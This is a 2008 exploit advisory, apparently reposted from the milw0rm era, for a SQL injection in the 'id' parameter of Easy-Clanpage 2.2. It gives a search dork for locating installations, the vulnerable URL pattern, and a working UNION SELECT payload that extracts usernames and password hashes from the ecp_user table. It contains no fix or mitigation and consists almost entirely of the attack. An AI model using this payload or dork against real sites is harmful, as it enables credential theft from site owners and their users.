Security Advisory: Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [ GLSA 200803-29 ] ViewVC: Multiple vulnerabilities
  KAPhotoservice (album.asp) Remote SQL Injection Exploit
  PEEL CMS Admin Hash Extraction and Remote Upload

From: info_(at)_shadowturk.org <info_(at)_shadowturk.org>
Date: 20.03.2008
Subject: Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability

#########################################################################
##################        Easy-Clanpage v2.2          ###################
#############         SQL İnjection VuLnerabiLity          ##############
########                                                       ##########
#                                                                       #
#########################################################################
#
# AUTHOR : MadNet
#
# HOMEPAGE : http://www.Shadowturk.org/
#
# Mail     : MadNet[at]hackertr[dot]org
#
#########################################################################
#
#Source: http://easy-clanpage.de/?section=downloads&show=viewdownload&id=14
#
#
#Dork :"Easy-Clanpage v2.2"
##########################################################################
#Vunl File :
#
#/inc/module/online.php
#
#EXPLOIT :
#
#http://www.[site].com/[path]/?section=user&action=details&id=
#
#EXAMPLE :
#
#-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,
7/**/from/**/ecp_user/**/where/**/userid=1/*
#
##########################################################################
#                        www.ShadowTURK.Org
##########################################################################
Thanks : Str0ke and Milw0rm
##########################################################################